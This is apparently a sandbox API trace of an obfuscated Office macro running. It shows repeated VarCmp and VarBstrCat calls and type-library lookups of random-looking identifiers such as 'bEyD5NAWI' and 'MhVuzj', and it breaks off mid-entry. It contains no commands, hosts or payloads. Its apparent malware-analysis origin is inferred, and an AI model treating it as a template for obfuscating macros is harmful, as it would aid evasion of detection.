[0060.731] VarCmp (pvarLeft=0x345cbc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.731] VarCmp (pvarLeft=0x345cbc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.731] VarCmp (pvarLeft=0x345c4c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.731] VarCmp (pvarLeft=0x345c4c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.731] VarCmp (pvarLeft=0x345c4c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.731] VarCmp (pvarLeft=0x345bfc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.731] VarCmp (pvarLeft=0x345bfc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.731] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.731] VarCmp (pvarLeft=0x345bac, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.731] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.731] VarCmp (pvarLeft=0x345b5c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.731] VarBstrCat (in: bstrLeft="", bstrRight="11781.50742121", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.732] VarCmp (pvarLeft=0x345b0c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.732] VarCmp (pvarLeft=0x345b0c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.732] VarCmp (pvarLeft=0x345b0c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.732] VarCmp (pvarLeft=0x345abc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.732] VarCmp (pvarLeft=0x345abc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.732] VarCmp (pvarLeft=0x345a7c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.732] VarCmp (pvarLeft=0x345a7c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.732] VarCmp (pvarLeft=0x345a7c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.732] VarCmp (pvarLeft=0x345a3c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.732] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.732] VarCmp (pvarLeft=0x345a0c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.732] VarCmp (pvarLeft=0x345a0c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.732] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.732] VarCmp (pvarLeft=0x3459ac, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.733] VarCmp (pvarLeft=0x3459ac, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.733] VarCmp (pvarLeft=0x3459ac, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.733] VarCmp (pvarLeft=0x34596c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.733] VarBstrCat (in: bstrLeft="", bstrRight="39050.813405542", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.733] VarCmp (pvarLeft=0x34591c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.733] VarCmp (pvarLeft=0x34591c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.733] VarCmp (pvarLeft=0x3458dc, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.733] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.733] VarCmp (pvarLeft=0x34589c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.733] VarBstrCat (in: bstrLeft="", bstrRight="53522.322654206", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.733] VarCmp (pvarLeft=0x34584c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.733] VarCmp (pvarLeft=0x34582c, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.734] VarBstrCat (in: bstrLeft="", bstrRight="0", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.734] VarCmp (pvarLeft=0x3457d8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.734] VarCmp (pvarLeft=0x3457a8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.734] VarCmp (pvarLeft=0x345778, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.734] VarCmp (pvarLeft=0x345778, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.734] VarCmp (pvarLeft=0x345778, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.734] VarCmp (pvarLeft=0x345718, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.734] VarCmp (pvarLeft=0x345718, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.734] VarCmp (pvarLeft=0x3456d8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.734] VarCmp (pvarLeft=0x3456d8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.734] VarCmp (pvarLeft=0x3456d8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.734] VarCmp (pvarLeft=0x345688, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.734] VarCmp (pvarLeft=0x345688, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.734] VarCmp (pvarLeft=0x345688, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.734] VarCmp (pvarLeft=0x345628, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.734] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.735] VarCmp (pvarLeft=0x3455e8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.735] VarCmp (pvarLeft=0x3455e8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.735] VarCmp (pvarLeft=0x3455e8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.735] VarCmp (pvarLeft=0x345598, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.735] VarCmp (pvarLeft=0x345598, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.735] VarCmp (pvarLeft=0x345598, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.735] VarCmp (pvarLeft=0x345538, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.735] VarCmp (pvarLeft=0x345538, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.735] VarCmp (pvarLeft=0x345538, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.735] VarCmp (pvarLeft=0x3454e8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.735] VarCmp (pvarLeft=0x3454e8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.735] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.735] VarCmp (pvarLeft=0x345498, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.735] VarBstrCat (in: bstrLeft="", bstrRight="3402.908967834", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.736] VarCmp (pvarLeft=0x345108, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x3450d8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x3450d8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x3450d8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x345078, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x345078, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x345078, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x345028, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x345028, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x344fe8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x344fe8, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x344f98, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x344f98, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x344f98, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x344f58, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarCmp (pvarLeft=0x344f58, pvarRight=0x34640c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.736] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x3445b4 | out: pbstrResult=0x3445b4) returned 0x0 [0060.737] CRetailMalloc_Realloc () returned 0x87504e0 [0060.756] ITypeComp:RemoteBind (in: This=0x87ce890, szName="bEyD5NAWI", lHashVal=0x1049fa, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x508 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x508) returned 0x0 [0060.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372cea, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="bEyD5NAWI") returned 10 [0060.756] ITypeComp:RemoteBind (in: This=0x87ce668, szName="bEyD5NAWI", lHashVal=0x1049fa, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x508 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x508) returned 0x0 [0060.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372cea, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="bEyD5NAWI") returned 10 [0060.756] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="bEyD5NAWI", lHashVal=0x1049fa, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x508 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x508) returned 0x0 [0060.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372cea, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="bEyD5NAWI") returned 10 [0060.757] ITypeComp:RemoteBind (in: This=0x87cef08, szName="bEyD5NAWI", lHashVal=0x1049fa, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x508 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x508) returned 0x0 [0060.757] CRetailMalloc_Alloc () returned 0x874fba0 [0060.757] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5372cea | out: _Dst=0x874fba0) returned 0x0 [0060.758] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea05ea, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_bEyD5NAWI") returned 17 [0060.758] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_bEyD5NAWI", lHashVal=0x10533f, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.758] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5372cea | out: _Dst=0x343ddc) returned 0x0 [0060.758] CRetailMalloc_Free () returned 0x18460101 [0060.758] ITypeComp:RemoteBind (in: This=0x87ce890, szName="MhVuzj", lHashVal=0x1009a5, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x50a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x50a) returned 0x0 [0060.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372d12, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="MhVuzj") returned 7 [0060.758] ITypeComp:RemoteBind (in: This=0x87ce668, szName="MhVuzj", lHashVal=0x1009a5, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x50a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x50a) returned 0x0 [0060.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372d12, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="MhVuzj") returned 7 [0060.759] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="MhVuzj", lHashVal=0x1009a5, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x50a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x50a) returned 0x0 [0060.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372d12, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="MhVuzj") returned 7 [0060.759] ITypeComp:RemoteBind (in: This=0x87cef08, szName="MhVuzj", lHashVal=0x1009a5, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x50a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x50a) returned 0x0 [0060.759] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.759] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x5372d12 | out: _Dst=0x87fcbd8) returned 0x0 [0060.760] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea061a, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_MhVuzj") returned 14 [0060.760] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_MhVuzj", lHashVal=0x10844e, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.760] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5372d12 | out: _Dst=0x343ddc) returned 0x0 [0060.760] CRetailMalloc_Free () returned 0x7670201 [0060.760] ITypeComp:RemoteBind (in: This=0x87ce890, szName="F4LAWSl", lHashVal=0x105b2e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x50c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x50c) returned 0x0 [0060.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372d36, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="F4LAWSl") returned 8 [0060.761] ITypeComp:RemoteBind (in: This=0x87ce668, szName="F4LAWSl", lHashVal=0x105b2e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x50c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x50c) returned 0x0 [0060.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372d36, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="F4LAWSl") returned 8 [0060.761] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="F4LAWSl", lHashVal=0x105b2e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x50c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x50c) returned 0x0 [0060.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372d36, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="F4LAWSl") returned 8 [0060.761] ITypeComp:RemoteBind (in: This=0x87cef08, szName="F4LAWSl", lHashVal=0x105b2e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x50c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x50c) returned 0x0 [0060.762] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.762] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x8, _Src=0x5372d36 | out: _Dst=0x87fcbd8) returned 0x0 [0060.762] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0646, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_F4LAWSl") returned 15 [0060.762] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_F4LAWSl", lHashVal=0x105eb2, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.762] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5372d36 | out: _Dst=0x343ddc) returned 0x0 [0060.763] CRetailMalloc_Free () returned 0x7670201 [0060.763] ITypeComp:RemoteBind (in: This=0x87ce890, szName="nPnBztC", lHashVal=0x10c416, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x50e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x50e) returned 0x0 [0060.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372d5a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="nPnBztC") returned 8 [0060.763] ITypeComp:RemoteBind (in: This=0x87ce668, szName="nPnBztC", lHashVal=0x10c416, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x50e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x50e) returned 0x0 [0060.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372d5a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="nPnBztC") returned 8 [0060.763] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="nPnBztC", lHashVal=0x10c416, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x50e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x50e) returned 0x0 [0060.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372d5a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="nPnBztC") returned 8 [0060.764] ITypeComp:RemoteBind (in: This=0x87cef08, szName="nPnBztC", lHashVal=0x10c416, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x50e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x50e) returned 0x0 [0060.764] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.764] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x8, _Src=0x5372d5a | out: _Dst=0x87fcbd8) returned 0x0 [0060.764] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0672, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_nPnBztC") returned 15 [0060.765] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_nPnBztC", lHashVal=0x10b819, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.765] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5372d5a | out: _Dst=0x343ddc) returned 0x0 [0060.765] CRetailMalloc_Free () returned 0x7670201 [0060.765] ITypeComp:RemoteBind (in: This=0x87ce890, szName="sjGOdIbn3", lHashVal=0x103bc2, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x510 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x510) returned 0x0 [0060.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372d7e, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="sjGOdIbn3") returned 10 [0060.765] ITypeComp:RemoteBind (in: This=0x87ce668, szName="sjGOdIbn3", lHashVal=0x103bc2, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x510 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x510) returned 0x0 [0060.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372d7e, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="sjGOdIbn3") returned 10 [0060.765] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="sjGOdIbn3", lHashVal=0x103bc2, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x510 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x510) returned 0x0 [0060.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372d7e, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="sjGOdIbn3") returned 10 [0060.766] ITypeComp:RemoteBind (in: This=0x87cef08, szName="sjGOdIbn3", lHashVal=0x103bc2, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x510 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x510) returned 0x0 [0060.766] CRetailMalloc_Alloc () returned 0x874fba0 [0060.766] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5372d7e | out: _Dst=0x874fba0) returned 0x0 [0060.767] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea069e, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_sjGOdIbn3") returned 17 [0060.767] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_sjGOdIbn3", lHashVal=0x104507, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.767] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5372d7e | out: _Dst=0x343ddc) returned 0x0 [0060.767] CRetailMalloc_Free () returned 